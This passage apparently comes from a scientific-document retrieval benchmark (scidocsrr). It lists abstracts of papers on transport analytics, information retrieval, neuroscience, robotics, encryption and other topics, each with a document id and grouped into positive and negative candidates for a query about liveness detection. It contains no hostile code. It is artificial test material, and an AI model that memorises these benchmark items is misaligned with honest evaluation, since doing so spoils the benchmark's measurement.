"text": "The increasing availability of large-scale location traces creates unprecedent opportunities to change the paradigm for knowledge discovery in transportation systems. A particularly promising area is to extract useful business intelligence, which can be used as guidance for reducing inefficiencies in energy consumption of transportation sectors, improving customer experiences, and increasing business performances. However, extracting business intelligence from location traces is not a trivial task. Conventional data analytic tools are usually not customized for handling large, complex, dynamic, and distributed nature of location traces. To that end, we develop a taxi business intelligence system to explore the massive taxi location traces from different business perspectives with various data mining functions. Since we implement the system using the real-world taxi GPS data, this demonstration will help taxi companies to improve their business performances by understanding the behaviors of both drivers and customers. In addition, several identified technical challenges also motivate data mining people to develop more sophisticate techniques in the future.",
"title": ""
},
{
"docid": "871d6acae5a9d95f81b0ff6513332cb2",
"text": "A novel probabilistic retrieval model is presented. It forms a basis to interpret the TF-IDF term weights as making relevance decisions. It simulates the local relevance decision-making for every location of a document, and combines all of these “local” relevance decisions as the “document-wide” relevance decision for the document. The significance of interpreting TF-IDF in this way is the potential to: (1) establish a unifying perspective about information retrieval as relevance decision-making; and (2) develop advanced TF-IDF-related term weights for future elaborate retrieval models. Our novel retrieval model is simplified to a basic ranking formula that directly corresponds to the TF-IDF term weights. In general, we show that the term-frequency factor of the ranking formula can be rendered into different term-frequency factors of existing retrieval systems. In the basic ranking formula, the remaining quantity - log p(&rmacr;|t ∈ d) is interpreted as the probability of randomly picking a nonrelevant usage (denoted by &rmacr;) of term t. Mathematically, we show that this quantity can be approximated by the inverse document-frequency (IDF). Empirically, we show that this quantity is related to IDF, using four reference TREC ad hoc retrieval data collections.",
"title": ""
}
] | [
{
"docid": "14aea0d3fce695ee7f6bf39e1fa97ecd",
"text": "Interpreters designed for high general-purpose performance typically perform a large number of indirect branches (3.2%–13% of all executed instructions in our benchmarks). These branches consume more than half of the run-time in a number of configurations we simulated. We evaluate how accurate various existing and proposed branch prediction schemes are on a number of interpreters, how the mispredictions affect the performance of the interpreters and how two different interpreter implementation techniques perform with various branch predictors. We also suggest various ways in which hardware designers, C compiler writers, and interpreter writers can improve the performance of interpreters.",
"title": ""
},
{
"docid": "b6e6784d18c596565ca1e4d881398a0d",
"text": "Uncovering lies (or deception) is of critical importance to many including law enforcement and security personnel. Though these people may try to use many different tactics to discover deception, previous research tells us that this cannot be accomplished successfully without aid. This manuscript reports on the promising results of a research study where data and text mining methods along with a sample of real-world data from a high-stakes situation is used to detect deception. At the end, the information fusion based classification models produced better than 74% classification accuracy on the holdout sample using a 10-fold cross validation methodology. Nonetheless, artificial neural networks and decision trees produced accuracy rates of 73.46% and 71.60% respectively. However, due to the high stakes associated with these types of decisions, the extra effort of combining the models to achieve higher accuracy",
"title": ""
},
{
"docid": "877d7d467711e8cb0fd03a941c7dc9da",
"text": "Film clips are widely utilized to elicit emotion in a variety of research studies. Normative ratings for scenes selected for these purposes support the idea that selected clips correspond to the intended target emotion, but studies reporting normative ratings are limited. Using an ethnically diverse sample of college undergraduates, selected clips were rated for intensity, discreteness, valence, and arousal. Variables hypothesized to affect the perception of stimuli (i.e., gender, race-ethnicity, and familiarity) were also examined. Our analyses generally indicated that males reacted strongly to positively valenced film clips, whereas females reacted more strongly to negatively valenced film clips. Caucasian participants tended to react more strongly to the film clips, and we found some variation by race-ethnicity across target emotions. Finally, familiarity with the films tended to produce higher ratings for positively valenced film clips, and lower ratings for negatively valenced film clips. These findings provide normative ratings for a useful set of film clips for the study of emotion, and they underscore factors to be considered in research that utilizes scenes from film for emotion elicitation.",
"title": ""
},
{
"docid": "79a500e8989fc5fb51097294ea504b0b",
"text": "An approach is presented that can be used to enhance the realism of yacht fleet race simulations. The wake of an upwind sailing yacht is represented as a single heeled horseshoe vortex (and image) system. At each time step changes in vortex strength are convected into the wake as a pair of vortex line elements. These subsequently move in accordance with the local wind, self-induced velocity and velocity induced by the presence of the wakes of other yachts. An empirical based decay factor is used to eventually remove the far wake. A synthesis of sail yacht wake representations based on detailed 3D Reynolds Averaged Navier-Stokes (RANS) Computational Fluid Dynamics (CFD) calculations with wind tunnel test results are used to capture the initial strength of the combined main-jib vortex system and its vertical height. These were based on a typical upwind sail arrangement for a range of heel angles and in-line calculations for a pair of yachts separated by three boat lengths. This paper details the basis of the validated CFD results for a yacht at heel and the analysis of the CFD results to provide an approximate single line vortex method for the yacht. The developed algorithm will eventually run within the Robo-Race which is a real-time yacht race strategy analysis tool based on MATLAB-Simulink developed at the University of Southampton. 1 Research Student, Fluid Structure Interactions Research Group, School of Engineering Sciences, University of Southampton, UK 2 Reader, Fluid Structure Interactions Research Group, School of Engineering Sciences, University of Southampton, UK 3 Head of Group, Fluid Structure Interactions Research Group, School of Engineering Sciences, University of Southampton, UK 4 Research Engineer, Wolfson Unit for Marine Technology and Industrial Aerodynamics, University of Southampton, UK NOMENCLATURE ACC America's Cup Class AoA Angle of Attack CFD Computational Fluid Dynamics RANS Reynolds Averaged Navier-Stokes SST Shear Stress Transport CL, CD Lift and drag coefficients L Sail rig and yacht length r = {x, y, z} Position U Freestream velocity q = {u, v, w} Induced velocities in x-, y-, -z directions Γi Vortex strength of element i ω Vorticity",
"title": ""
},
{
"docid": "f96ec3cda630806531ea5f057d34a5fe",
"text": "W analyze firms’ decisions to invest in customer relationship management (CRM) initiatives such as acquisition and retention in a competitive context, a topic largely ignored in past CRM research. We characterize each customer by her intrinsic preference towards each firm, the contribution margin she generates for each firm, and her responsiveness to each firm’s retention and acquisition efforts. We show that a firm should invest most heavily in retaining those customers that exhibit moderate responsiveness to its CRM efforts. Further, a firm should most aggressively seek to attract those customers that exhibit moderate responsiveness to their provider’s CRM efforts and those that are moderately profitable for their current provider. Investing more in customers that are more responsive does not always lead to higher firm profits, because stronger competition for such customers tends to erode the effects of higher CRM efforts of an individual firm. When firms develop a customer relationship over time to generate higher contribution margin or customer responsiveness, we show that such developments may not always be desirable, because sometimes these future benefits may lead to more intense competition and hence lower profits for both firms.",
"title": ""
},
{
"docid": "391f9b889b1c3ffe3e8ee422d108edcd",
"text": "Does the brain of a bilingual process language differently from that of a monolingual? We compared how bilinguals and monolinguals recruit classic language brain areas in response to a language task and asked whether there is a neural signature of bilingualism. Highly proficient and early-exposed adult Spanish-English bilinguals and English monolinguals participated. During functional magnetic resonance imaging (fMRI), participants completed a syntactic sentence judgment task [Caplan, D., Alpert, N., & Waters, G. Effects of syntactic structure and propositional number on patterns of regional cerebral blood flow. Journal of Cognitive Neuroscience, 10, 541552, 1998]. The sentences exploited differences between Spanish and English linguistic properties, allowing us to explore similarities and differences in behavioral and neural responses between bilinguals and monolinguals, and between a bilingual's two languages. If bilinguals' neural processing differs across their two languages, then differential behavioral and neural patterns should be observed in Spanish and English. Results show that behaviorally, in English, bilinguals and monolinguals had the same speed and accuracy, yet, as predicted from the Spanish-English structural differences, bilinguals had a different pattern of performance in Spanish. fMRI analyses revealed that both monolinguals (in one language) and bilinguals (in each language) showed predicted increases in activation in classic language areas (e.g., left inferior frontal cortex, LIFC), with any neural differences between the bilingual's two languages being principled and predictable based on the morphosyntactic differences between Spanish and English. However, an important difference was that bilinguals had a significantly greater increase in the blood oxygenation level-dependent signal in the LIFC (BA 45) when processing English than the English monolinguals. The results provide insight into the decades-old question about the degree of separation of bilinguals' dual-language representation. The differential activation for bilinguals and monolinguals opens the question as to whether there may possibly be a neural signature of bilingualism. Differential activation may further provide a fascinating window into the language processing potential not recruited in monolingual brains and reveal the biological extent of the neural architecture underlying all human language.",
"title": ""
},
{
"docid": "0add9f22db24859da50e1a64d14017b9",
"text": "Light field imaging offers powerful new capabilities through sophisticated digital processing techniques that are tightly merged with unconventional optical designs. This combination of imaging technology and computation necessitates a fundamentally different view of the optical properties of imaging systems and poses new challenges for the traditional signal and image processing domains. In this article, we aim to provide a comprehensive review of the considerations involved and the difficulties encountered in working with light field data.",
"title": ""
},
{
"docid": "6ff74a5f335cf80d88d8365e9ef7b47b",
"text": "This paper presents an unsupervised deep-learning framework named local deep-feature alignment (LDFA) for dimension reduction. We construct neighbourhood for each data sample and learn a local stacked contractive auto-encoder (SCAE) from the neighbourhood to extract the local deep features. Next, we exploit an affine transformation to align the local deep features of each neighbourhood with the global features. Moreover, we derive an approach from LDFA to map explicitly a new data sample into the learned low-dimensional subspace. The advantage of the LDFA method is that it learns both local and global characteristics of the data sample set: the local SCAEs capture local characteristics contained in the data set, while the global alignment procedures encode the interdependencies between neighbourhoods into the final low-dimensional feature representations. Experimental results on data visualization, clustering, and classification show that the LDFA method is competitive with several well-known dimension reduction techniques, and exploiting locality in deep learning is a research topic worth further exploring.",
"title": ""
},
{
"docid": "ce5faeac9aa55ce5f0a481de290a27d4",
"text": "In the last decade, Web 2.0 services have been widely used as communication media. Due to the huge amount of available information, searching has become dominant in the use of Internet. Millions of users daily interact with search engines, producing valuable sources of interesting data regarding several aspects of the world. Search queries prove to be a useful source of information in financial applications, where the frequency of searches of terms related to the digital currency can be a good measure of interest in it. Bitcoin, a decentralized electronic currency, represents a radical change in financial systems, attracting a large number of users and a lot of media attention. In this work we studied the existing relationship between Bitcoin's trading volumes and the queries volumes of Google search engine. We achieved significant cross correlation values, demonstrating search volumes power to anticipate trading volumes of Bitcoin currency.",
"title": ""
},
{
"docid": "42b9c96304a708975b3032d8df12ba30",
"text": "This paper proposes a deep learning method to estimate the remaining useful life (RUL) of aero-propulsion engines. The proposed method is based on the long short-term memory (LSTM) structure of the recurrent neural network (RNN). LSTM can effectively extract the relationship between data items that are far separated in the time series. The proposed method is applied to the NASA C-MAPSS data set for RUL estimation accuracy evaluation and is compared with the methods using the multi-layer perceptron (MLP), support vector regression (SVR), relevance vector regression (RVR) and convolutional neural network (CNN). Comparisons show that the proposed method is better than others in terms of the root mean squared error (RMSE) and the value of a scoring function.",
"title": ""
},
{
"docid": "527c1e2a78e7f171025231a475a828b9",
"text": "Cryptography is the science to transform the information in secure way. Encryption is best alternative to convert the data to be transferred to cipher data which is an unintelligible image or data which cannot be understood by any third person. Images are form of the multimedia data. There are many image encryption schemes already have been proposed, each one of them has its own potency and limitation. This paper presents a new algorithm for the image encryption/decryption scheme which has been proposed using chaotic neural network. Chaotic system produces the same results if the given inputs are same, it is unpredictable in the sense that it cannot be predicted in what way the system's behavior will change for any little change in the input to the system. The objective is to investigate the use of ANNs in the field of chaotic Cryptography. The weights of neural network are achieved based on chaotic sequence. The chaotic sequence generated and forwarded to ANN and weighs of ANN are updated which influence the generation of the key in the encryption algorithm. The algorithm has been implemented in the software tool MATLAB and results have been studied. To compare the relative performance peak signal to noise ratio (PSNR) and mean square error (MSE) are used.",
"title": ""
},
{
"docid": "5056c2a6f132c25e4b0ff1a79c72f508",
"text": "The proliferation of Bluetooth Low-Energy (BLE) chipsets on mobile devices has lead to a wide variety of user-installable tags and beacons designed for location-aware applications. In this paper, we present the Acoustic Location Processing System (ALPS), a platform that augments BLE transmitters with ultrasound in a manner that improves ranging accuracy and can help users configure indoor localization systems with minimal effort. A user places three or more beacons in an environment and then walks through a calibration sequence with their mobile device where they touch key points in the environment like the floor and the corners of the room. This process automatically computes the room geometry as well as the precise beacon locations without needing auxiliary measurements. Once configured, the system can track a user's location referenced to a map.\n The platform consists of time-synchronized ultrasonic transmitters that utilize the bandwidth just above the human hearing limit, where mobile devices are still sensitive and can detect ranging signals. To aid in the mapping process, the beacons perform inter-beacon ranging during setup. Each beacon includes a BLE radio that can identify and trigger the ultrasonic signals. By using differences in propagation characteristics between ultrasound and radio, the system can classify if beacons are within Line-Of-Sight (LOS) to the mobile phone. In cases where beacons are blocked, we show how the phone's inertial measurement sensors can be used to supplement localization data. We experimentally evaluate that our system can estimate three-dimensional beacon location with a Euclidean distance error of 16.1cm, and can generate maps with room measurements with a two-dimensional Euclidean distance error of 19.8cm. When tested in six different environments, we saw that the system can identify Non-Line-Of-Sight (NLOS) signals with over 80% accuracy and track a user's location to within less than 100cm.",
"title": ""
},
{
"docid": "c00470d69400066d11374539052f4a86",
"text": "When individuals learn facts (e.g., foreign language vocabulary) over multiple study sessions, the temporal spacing of study has a significant impact on memory retention. Behavioral experiments have shown a nonmonotonic relationship between spacing and retention: short or long intervals between study sessions yield lower cued-recall accuracy than intermediate intervals. Appropriate spacing of study can double retention on educationally relevant time scales. We introduce a Multiscale Context Model (MCM) that is able to predict the influence of a particular study schedule on retention for specific material. MCM’s prediction is based on empirical data characterizing forgetting of the material following a single study session. MCM is a synthesis of two existing memory models (Staddon, Chelaru, & Higa, 2002; Raaijmakers, 2003). On the surface, these models are unrelated and incompatible, but we show they share a core feature that allows them to be integrated. MCM can determine study schedules that maximize the durability of learning, and has implications for education and training. MCM can be cast either as a neural network with inputs that fluctuate over time, or as a cascade of leaky integrators. MCM is intriguingly similar to a Bayesian multiscale model of memory (Kording, Tenenbaum, & Shadmehr, 2007), yet MCM is better able to account for human declarative memory.",
"title": ""
},
{
"docid": "9e439c83f4c29b870b1716ceae5aa1f3",
"text": "Suspension system plays an imperative role in retaining the continuous road wheel contact for better road holding. In this paper, fuzzy self-tuning of PID controller is designed to control of active suspension system for quarter car model. A fuzzy self-tuning is used to develop the optimal control gain for PID controller (proportional, integral, and derivative gains) to minimize suspension working space of the sprung mass and its change rate to achieve the best comfort of the driver. The results of active suspension system with fuzzy self-tuning PID controller are presented graphically and comparisons with the PID and passive system. It is found that, the effectiveness of using fuzzy self-tuning appears in the ability to tune the gain parameters of PID controller",
"title": ""
},
{
"docid": "b4428d6c64a7cf000a89d29d4d8c37cd",
"text": "In this paper the autonomous flight mode conversion control scheme for a Quad-TiltRotor Unmanned Aerial Vehicle is presented. This convertible UAV type has the capability for flying both as a helicopter as well as a fixed-wing aircraft type, by adjusting the orientation of its tilt-enabled rotors. Thus, a platform combining the operational advantages of two commonly distinct aircraft types is formed. However, its autonomous mid-flight conversion is an issue of increased complexity. The approach presented is based on an innovative control scheme, developed based on hybrid systems theory. Particularly, a piecewise affine modeling approximation of the complete nonlinear dynamics is derived and serves as the model for control over which a hybrid predictive controller that provides global stabilization, optimality and constraints satisfaction is computed. The effectiveness of the proposed control scheme in handling the mode conversion from helicopter to fixed-wing (and conversely) is demonstrated via a series of simulation studies. The proposed control scheme exceeds the functionality of the aforementioned flight-mode conversion and is also able to handle the transition to intermediate flight-modes with rotors slightly tilted forward in order to provide a forward force component while flying in close to helicopter-mode.",
"title": ""
},
{
"docid": "0a557bbd59817ceb5ae34699c72d79ee",
"text": "In this paper, we propose a PTS-based approach to solve the high peak-to-average power ratio (PAPR) problem in filter bank multicarrier (FBMC) system with the consider of the prototype filter and the overlap feature of the symbols in time domain. In this approach, we improve the performance of the traditional PTS approach by modifying the choice of the best weighting factors with the consideration of the overlap between the present symbol and the past symbols. The simulation result shows this approach performs better than traditional PTS approach in the reduction of PAPR in FBMC system.",
"title": ""
},
{
"docid": "0ee435f59529fa0e1c5a01d3488aa6ed",
"text": "The additivity of wavelet subband quantization distortions was investigated in an unmasked detection task and in masked detection and discrimination tasks. Contrast thresholds were measured for both simple targets (artifacts induced by uniform quantization of individual discrete wavelet transform subbands) and compound targets (artifacts induced by uniform quantization of pairs of discrete wavelet transform subbands) in the presence of no mask and eight different natural image maskers. The results were used to assess summation between wavelet subband quantization distortions on orientation and spatial-frequency dimensions. In the unmasked detection experiment, subthreshold quantization distortions pooled in a non-linear fashion and the amount of summation agreed with those of previous summation-atthreshold experiments (ß=2.43; relative sensitivity=1.33). In the masked detection and discrimination experiments, suprathreshold quantization distortions pooled in a linear fashion. Summation increased as the distortions became increasingly suprathreshold but quickly settled to near-linear values. Summation on the spatial-frequency dimension was greater than summation on the orientation dimension for all suprathreshold contrasts. A high degree of uncertainty imposed by the natural image maskers precludes quantifying an absolute measure of summation.",
"title": ""
},
{
"docid": "b902e401f0dd4cfa532a3561c9ab1d8c",
"text": "Valerie the roboceptionist is the most recent addition to Carnegie Mellon's social robots project. A permanent installation in the entranceway to Newell-Simon hall, the robot combines useful functionality - giving directions, looking up weather forecasts, etc. - with an interesting and compelling character. We are using Valerie to investigate human-robot social interaction, especially long-term human-robot \"relationships\". Over a nine-month period, we have found that many visitors continue to interact with the robot on a daily basis, but that few of the individual interactions last for more than 30 seconds. Our analysis of the data has indicated several design decisions that should facilitate more natural human-robot interactions.",
"title": ""
},
{
"docid": "a0d7071fcaf2881328cadb1eb5195e0b",
"text": "To capture the interdependencies between labels in multi-label classification problems, classifier chain (CC) tries to take the multiple labels of each instance into account under a deterministic high-order Markov Chain model. Since its performance is sensitive to the choice of label order, the key issue is how to determine the optimal label order for CC. In this work, we first generalize the CC model over a random label order. Then, we present a theoretical analysis of the generalization error for the proposed generalized model. Based on our results, we propose a dynamic programming based classifier chain (CC-DP) algorithm to search the globally optimal label order for CC and a greedy classifier chain (CC-Greedy) algorithm to find a locally optimal CC. Comprehensive experiments on a number of real-world multi-label data sets from various domains demonstrate that our proposed CC-DP algorithm outperforms state-of-the-art approaches and the CCGreedy algorithm achieves comparable prediction performance with CC-DP.",
"title": ""
}
] | scidocsrr |
c95116a2e08e4eba28e0bf7851f1f49a | Is physics-based liveness detection truly possible with a single image? | [
{
"docid": "b40129a15767189a7a595db89c066cf8",
"text": "To increase reliability of face recognition system, the system must be able to distinguish real face from a copy of face such as a photograph. In this paper, we propose a fast and memory efficient method of live face detection for embedded face recognition system, based on the analysis of the movement of the eyes. We detect eyes in sequential input images and calculate variation of each eye region to determine whether the input face is a real face or not. Experimental results show that the proposed approach is competitive and promising for live face detection. Keywords—Liveness Detection, Eye detection, SQI.",
"title": ""
}
] | [
{
"docid": "0d48e7715f3e0d74407cc5a21f2c322a",
"text": "Every teacher of linear algebra should be familiar with the matrix singular value decomposition (or SVD). It has interesting and attractive algebraic properties, and conveys important geometrical and theoretical insights about linear transformations. The close connection between the SVD and the well known theory of diagonalization for symmetric matrices makes the topic immediately accessible to linear algebra teachers, and indeed, a natural extension of what these teachers already know. At the same time, the SVD has fundamental importance in several different applications of linear algebra. Strang was aware of these facts when he introduced the SVD in his now classical text [22, page 142], observing",
"title": ""
},
{
"docid": "946ad58856b018604d59a3e0e08a48a7",
"text": "The well known approaches of tuning and self-tuning of data management systems are essential in the context of the Cloud environment, which promises self management properties, such as elasticity, scalability, and fault tolerance. Moreover, the intricate Cloud storage systems criteria, such as their modular, distributed, and multi-layered architecture, add to the complexity of the tuning process and necessity of the self-tuning process. Furthermore, if we have one or more applications with one or more workloads with contradicting and possibly changing optimization goals, we are faced with the question of how to tune the underlying storage system cluster to best achieve the optimization goals of all workloads. Based on that, we define the tuning problem as finding the cluster configuration out of a set of possible configurations that would minimize the aggregated cost value for all workloads while still fulfilling their performance thresholds. In order to solve such a problem, we investigate the design and implementation of a Cloud storage system agnostic (self-)tuning framework. This framework consists of components to observe, and model different performance criteria of the underlying Cloud storage system. It also includes a decision model to configure tuning parameters based on applications requirements. To model the performance of the underlying Cloud storage system, we use statistical machine learning techniques. The statistical data that is needed to model the performance can be generated in a training phase. For that we designed a training component that generates workloads and automates the testing process with different cluster configurations. As part of our evaluation, we address the essential problem of tuning the cluster size of the Cloud storage system while minimizing the latency for the targeted workloads. In order to do that, we model the latency in relation to cluster size and workload characteristics. The predictive models can then be used by the decision component to search for the optimal allocation of nodes to workloads. We also evaluate different alternatives for the search algorithms as part of the decision component implementation. These alternatives include brute-force, and genetic algorithm approaches.",
"title": ""
},
{
"docid": "10d9758469a1843d426f56a379c2fecb",
"text": "A novel compact-size branch-line coupler using composite right/left-handed transmission lines is proposed in this paper. In order to obtain miniaturization, composite right/left-handed transmission lines with novel complementary split single ring resonators which are realized by loading a pair of meander-shaped-slots in the split of the ring are designed. This novel coupler occupies only 22.8% of the area of the conventional approach at 0.7 GHz. The proposed coupler can be implemented by using the standard printed-circuit-board etching processes without any implementation of lumped elements and via-holes, making it very useful for wireless communication systems. The agreement between measured and stimulated results validates the feasible configuration of the proposed coupler.",
"title": ""
},
{
"docid": "c4fcd7db5f5ba480d7b3ecc46bef29f6",
"text": "In this paper, we propose an indoor action detection system which can automatically keep the log of users' activities of daily life since each activity generally consists of a number of actions. The hardware setting here adopts top-view depth cameras which makes our system less privacy sensitive and less annoying to the users, too. We regard the series of images of an action as a set of key-poses in images of the interested user which are arranged in a certain temporal order and use the latent SVM framework to jointly learn the appearance of the key-poses and the temporal locations of the key-poses. In this work, two kinds of features are proposed. The first is the histogram of depth difference value which can encode the shape of the human poses. The second is the location-signified feature which can capture the spatial relations among the person, floor, and other static objects. Moreover, we find that some incorrect detection results of certain type of action are usually associated with another certain type of action. Therefore, we design an algorithm that tries to automatically discover the action pairs which are the most difficult to be differentiable, and suppress the incorrect detection outcomes. To validate our system, experiments have been conducted, and the experimental results have shown effectiveness and robustness of our proposed method.",
"title": ""
},
{
"docid": "dd0a1a3d6de377efc0a97004376749b6",
"text": "Time series often have a temporal hierarchy, with information that is spread out over multiple time scales. Common recurrent neural networks, however, do not explicitly accommodate such a hierarchy, and most research on them has been focusing on training algorithms rather than on their basic architecture. In this paper we study the effect of a hierarchy of recurrent neural networks on processing time series. Here, each layer is a recurrent network which receives the hidden state of the previous layer as input. This architecture allows us to perform hierarchical processing on difficult temporal tasks, and more naturally capture the structure of time series. We show that they reach state-of-the-art performance for recurrent networks in character-level language modeling when trained with simple stochastic gradient descent. We also offer an analysis of the different emergent time scales.",
"title": ""
},
{
"docid": "9aab4a607de019226e9465981b82f9b8",
"text": "Color is frequently used to encode values in visualizations. For color encodings to be effective, the mapping between colors and values must preserve important differences in the data. However, most guidelines for effective color choice in visualization are based on either color perceptions measured using large, uniform fields in optimal viewing environments or on qualitative intuitions. These limitations may cause data misinterpretation in visualizations, which frequently use small, elongated marks. Our goal is to develop quantitative metrics to help people use color more effectively in visualizations. We present a series of crowdsourced studies measuring color difference perceptions for three common mark types: points, bars, and lines. Our results indicate that peoples' abilities to perceive color differences varies significantly across mark types. Probabilistic models constructed from the resulting data can provide objective guidance for designers, allowing them to anticipate viewer perceptions in order to inform effective encoding design.",
"title": ""
},
{
"docid": "3b0f2413234109c6df1b643b61dc510b",
"text": "Most people think computers will never be able to think. That is, really think. Not now or ever. To be sure, most people also agree that computers can do many things that a person would have to be thinking to do. Then how could a machine seem to think but not actually think? Well, setting aside the question of what thinking actually is, I think that most of us would answer that by saying that in these cases, what the computer is doing is merely a superficial imitation of human intelligence. It has been designed to obey certain simple commands, and then it has been provided with programs composed of those commands. Because of this, the computer has to obey those commands, but without any idea of what's happening.",
"title": ""
},
{
"docid": "5d243f8492f12a135d68bd15ddf2488d",
"text": "The success of \"infinite-inventory\" retailers such as Amazon.com and Netflix has been ascribed to a \"long tail\" phenomenon. To wit, while the majority of their inventory is not in high demand, in aggregate these \"worst sellers,\" unavailable at limited-inventory competitors, generate a significant fraction of total revenue. The long tail phenomenon, however, is in principle consistent with two fundamentally different theories. The first, and more popular hypothesis, is that a majority of consumers consistently follow the crowds and only a minority have any interest in niche content; the second hypothesis is that everyone is a bit eccentric, consuming both popular and specialty products. Based on examining extensive data on user preferences for movies, music, Web search, and Web browsing, we find overwhelming support for the latter theory. However, the observed eccentricity is much less than what is predicted by a fully random model whereby every consumer makes his product choices independently and proportional to product popularity; so consumers do indeed exhibit at least some a priori propensity toward either the popular or the exotic.\n Our findings thus suggest an additional factor in the success of infinite-inventory retailers, namely, that tail availability may boost head sales by offering consumers the convenience of \"one-stop shopping\" for both their mainstream and niche interests. This hypothesis is further supported by our theoretical analysis that presents a simple model in which shared inventory stores, such as Amazon Marketplace, gain a clear advantage by satisfying tail demand, helping to explain the emergence and increasing popularity of such retail arrangements. Hence, we believe that the return-on-investment (ROI) of niche products goes beyond direct revenue, extending to second-order gains associated with increased consumer satisfaction and repeat patronage. More generally, our findings call into question the conventional wisdom that specialty products only appeal to a minority of consumers.",
"title": ""
},
{
"docid": "e234686126b22695d8295f79083506a7",
"text": "In computer vision the most difficult task is to recognize the handwritten digit. Since the last decade the handwritten digit recognition is gaining more and more fame because of its potential range of applications like bank cheque analysis, recognizing postal addresses on postal cards, etc. Handwritten digit recognition plays a very vital role in day to day life, like in a form of recording of information and style of communication even with the addition of new emerging techniques. The performance of Handwritten digit recognition system is highly depend upon two things: First it depends on feature extraction techniques which is used to increase the performance of the system and improve the recognition rate and the second is the neural network approach which takes lots of training data and automatically infer the rule for matching it with the correct pattern. In this paper we have focused on different methods of handwritten digit recognition that uses both feature extraction techniques and neural network approaches and presented a comparative analysis while discussing pros and cons of each method.",
"title": ""
},
{
"docid": "4b557c498499c9bbb900d4983cc28426",
"text": "Document clustering has not been well received as an information retrieval tool. Objections to its use fall into two main categories: first, that clustering is too slow for large corpora (with running time often quadratic in the number of documents); and second, that clustering does not appreciably improve retrieval.\nWe argue that these problems arise only when clustering is used in an attempt to improve conventional search techniques. However, looking at clustering as an information access tool in its own right obviates these objections, and provides a powerful new access paradigm. We present a document browsing technique that employs document clustering as its primary operation. We also present fast (linear time) clustering algorithms which support this interactive browsing paradigm.",
"title": ""
},
{
"docid": "1bbb2888fd1111b3e24c54f198064941",
"text": "This paper presents a simple and active calibration technique of camera-projector systems based on planar homography. From the camera image of a planar calibration pattern, we generate a projector image of the pattern through the homography between the camera and the projector. To determine the coordinates of the pattern corners from the view of the projector, we actively project a corner marker from the projector to align the marker with the printed pattern corners. Calibration is done in two steps. First, four outer corners of the pattern are identified. Second, all other inner corners are identified. The pattern image from the projector is then used to calibrate the projector. Experimental results of two types of camera-projector systems show that the projection errors of both camera and projector are less than 1 pixel.",
"title": ""
},
{
"docid": "dfc6455cb7c12037faeb8c02c0027570",
"text": "This paper proposes efficient and powerful deep networks for action prediction from partially observed videos containing temporally incomplete action executions. Different from after-the-fact action recognition, action prediction task requires action labels to be predicted from these partially observed videos. Our approach exploits abundant sequential context information to enrich the feature representations of partial videos. We reconstruct missing information in the features extracted from partial videos by learning from fully observed action videos. The amount of the information is temporally ordered for the purpose of modeling temporal orderings of action segments. Label information is also used to better separate the learned features of different categories. We develop a new learning formulation that enables efficient model training. Extensive experimental results on UCF101, Sports-1M and BIT datasets demonstrate that our approach remarkably outperforms state-of-the-art methods, and is up to 300x faster than these methods. Results also show that actions differ in their prediction characteristics, some actions can be correctly predicted even though only the beginning 10% portion of videos is observed.",
"title": ""
},
{
"docid": "ccd5f02b97643b3c724608a4e4a67fdb",
"text": "Modular robotic systems that integrate distally with commercially available endoscopic equipment have the potential to improve the standard-of-care in therapeutic endoscopy by granting clinicians with capabilities not present in commercial tools, such as precision dexterity and feedback sensing. With the desire to integrate both sensing and actuation distally for closed-loop position control in fully deployable, endoscope-based robotic modules, commercial sensor and actuator options that acquiesce to the strict form-factor requirements are sparse or nonexistent. Herein, we describe a proprioceptive angle sensor for potential closed-loop position control applications in distal robotic modules. Fabricated monolithically using printed-circuit MEMS, the sensor employs a kinematic linkage and the principle of light intensity modulation to sense the angle of articulation with a high degree of fidelity. Onboard temperature and environmental irradiance measurements, coupled with linear regression techniques, provide robust angle measurements that are insensitive to environmental disturbances. The sensor is capable of measuring $\\pm$45 degrees of articulation with an RMS error of 0.98 degrees. An ex vivo demonstration shows that the sensor can give real-time proprioceptive feedback when coupled with an actuator module, opening up the possibility of fully distal closed-loop control.",
"title": ""
},
{
"docid": "913c8819f7f0bea4d356051442d074db",
"text": "From GuI to TuI Humans have evolved a heightened ability to sense and manipulate the physical world, yet the digital world takes little advantage of our capacity for hand-eye coordination. A tangible user interface (TUI) builds upon our dexterity by embodying digital information in physical space. Tangible design expands the affordances of physical objects so they can Graphical user interfaces (GUIs) let users see digital information only through a screen, as if looking into a pool of water, as depicted in Figure 1 on page 40. We interact with the forms below through remote controls, such as a mouse, a keyboard, or a touchscreen (Figure 1a). Now imagine an iceberg, a mass of ice that penetrates the surface of the water and provides a handle for the mass beneath. This metaphor describes tangible user interfaces: They act as physical manifestations of computation, allowing us to interact directly with the portion that is made tangible—the “tip of the iceberg” (Figure 1b). Radical Atoms takes a leap beyond tangible interfaces by assuming a hypothetical generation of materials that can change form and CoVer STorY",
"title": ""
},
{
"docid": "c2845a8a4f6c2467c7cd3a1a95a0ca37",
"text": "In this report I introduce ReSuMe a new supervised learning method for Spiking Neural Networks. The research on ReSuMe has been primarily motivated by the need of inventing an efficient learni ng method for control of movement for the physically disabled. Howeve r, thorough analysis of the ReSuMe method reveals its suitability not on ly to the task of movement control, but also to other real-life applicatio ns including modeling, identification and control of diverse non-statio nary, nonlinear objects. ReSuMe integrates the idea of learning windows, known from t he spikebased Hebbian rules, with a novel concept of remote supervis ion. General overview of the method, the basic definitions, the netwo rk architecture and the details of the learning algorithm are presented . The properties of ReSuMe such as locality, computational simplicity a nd the online processing suitability are discussed. ReSuMe learning abi lities are illustrated in a verification experiment.",
"title": ""
},
{
"docid": "be48b00ee50c872d42ab95e193ac774b",
"text": "T profitability of remanufacturing systems for different cost, technology, and logistics structures has been extensively investigated in the literature. We provide an alternative and somewhat complementary approach that considers demand-related issues, such as the existence of green segments, original equipment manufacturer competition, and product life-cycle effects. The profitability of a remanufacturing system strongly depends on these issues as well as on their interactions. For a monopolist, we show that there exist thresholds on the remanufacturing cost savings, the green segment size, market growth rate, and consumer valuations for the remanufactured products, above which remanufacturing is profitable. More important, we show that under competition remanufacturing can become an effective marketing strategy, which allows the manufacturer to defend its market share via price discrimination.",
"title": ""
},
{
"docid": "a2cbec8144197125cc5530aa6755196f",
"text": "This paper provides a survey of the research done on optimization in dynamic environments over the past decade. We show an analysis of the most commonly used problems, methods and measures together with the newer approaches and trends, as well as their interrelations and common ideas. The survey is supported by a public web repository, located at http://www.dynamic-optimization. org where the collected bibliography is manually organized and tagged according to different categories.",
"title": ""
},
{
"docid": "510504cec355ec68a92fad8f10527beb",
